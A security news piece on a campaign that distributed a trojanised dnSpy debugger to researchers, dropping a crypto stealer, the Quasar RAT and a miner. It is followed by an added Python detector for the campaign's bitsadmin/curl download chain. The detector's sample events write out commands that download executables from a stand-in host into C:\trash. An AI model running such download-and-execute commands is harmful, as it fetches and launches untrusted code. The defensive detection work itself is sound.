
A Malicious Version of the dnSpy App is Being Used to Target Security Experts

In an ongoing, sophisticated malware campaign, attackers have been found distributing a malicious version of the dnSpy app to cybersecurity experts. dnSpy is a .NET application, and the trojanised build is used to install the following on victims' compromised systems:

  • Cryptocurrency stealers
  • A Remote Access Trojan (RAT)
  • Miners

dnSpy is a debugger mostly used by developers and researchers to:

  • Debug .NET programs
  • Modify .NET programs
  • Decompile .NET programs

Malicious dnSpy 

The attackers behind the malicious dnSpy app have created a GitHub repository hosting a malicious version of dnSpy that delivers malware including:

  • A cryptocurrency stealer
  • The Quasar Remote Access Trojan
  • A miner
  • Unknown payloads

Malicious dnSpy’s distribution 

The attackers have created a specially crafted website, “dnSpy[.]net,” with a polished design that makes it look legitimate and professional, and use it to promote the malware. They also applied SEO techniques and related positioning methods to optimise the site so that it ranks on the first results page of all major search engines, including:

  • Google 
  • Yahoo 
  • Bing 
  • Yandex 
  • Ask.com 
  • AOL

When the malicious dnSpy app is launched, it runs a set of commands that perform the following actions with elevated permissions:

  • Disables Microsoft Defender
  • Disables User Account Control (UAC)
  • Uses bitsadmin.exe to download curl.exe
  • Uses curl.exe and bitsadmin.exe to download various payloads into the C:\trash folder and launch them
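As an added example that is not part of the article, the Python script below shows how a defender could flag the download chain listed above in process-creation telemetry. The log format, the sample events and the assumption that dnSpy.exe is the parent of the LOLBin processes are all constructed for illustration.

```python
"""Flag the bitsadmin -> curl.exe -> C:\\trash chain in process-creation events."""
import re
from typing import Dict, List

# Constructed sample records in a Sysmon-like "key=value|key=value" shape (not real telemetry).
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\bitsadmin.exe|ParentImage=C:\\Users\\dev\\dnSpy.exe|CommandLine=bitsadmin /transfer job /download /priority high http://example.invalid/curl.exe C:\\trash\\curl.exe",
    "Image=C:\\trash\\curl.exe|ParentImage=C:\\Users\\dev\\dnSpy.exe|CommandLine=C:\\trash\\curl.exe -o C:\\trash\\payload.exe http://example.invalid/p",
    "Image=C:\\Windows\\System32\\bitsadmin.exe|ParentImage=C:\\Windows\\System32\\svchost.exe|CommandLine=bitsadmin /list",
    "Image=C:\\Program Files\\dnSpy\\dnSpy.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=dnSpy.exe app.dll",
]

def parse_event(line: str) -> Dict[str, str]:
    """Split a 'key=value|key=value' record into a dict (split on the first '=' only)."""
    return dict(f.split("=", 1) for f in line.split("|") if "=" in f)

# Each rule is (name, predicate over a lower-cased event); matching is case-insensitive.
RULES = [
    # bitsadmin used as a downloader to fetch curl.exe
    ("bitsadmin_download_curl",
     lambda e: e["image"].endswith("bitsadmin.exe") and "/transfer" in e["cmd"] and "curl.exe" in e["cmd"]),
    # anything written under the staging folder the campaign used
    ("write_to_c_trash",
     lambda e: re.search(r"c:\\trash\\", e["cmd"]) is not None),
    # curl.exe executing from that staging folder rather than a normal install path
    ("curl_from_c_trash",
     lambda e: e["image"].startswith("c:\\trash\\") and e["image"].endswith("curl.exe")),
    # a debugger spawning download utilities is unusual (assumed parent name)
    ("lolbin_spawned_by_dnspy",
     lambda e: e["parent"].endswith("dnspy.exe")
     and e["image"].rsplit("\\", 1)[-1] in {"bitsadmin.exe", "curl.exe"}),
]

def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per event that triggers at least one rule, in input order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        e = {"image": ev.get("Image", "").lower(),
             "parent": ev.get("ParentImage", "").lower(),
             "cmd": ev.get("CommandLine", "").lower()}
        hits = [name for name, pred in RULES if pred(e)]
        if hits:
            findings.append({"image": ev.get("Image"), "rules": hits})
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The benign `bitsadmin /list` and the normal dnSpy launch produce no findings, so the rules key on the chain itself rather than on the tool names alone.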

Although this campaign is currently offline, developers should stay alert for malicious replicas of the tools they use. Attacks of this kind are not new, and they are becoming increasingly lucrative and sophisticated for attackers, who seek to harvest personal data and gain access to their victims' networks.
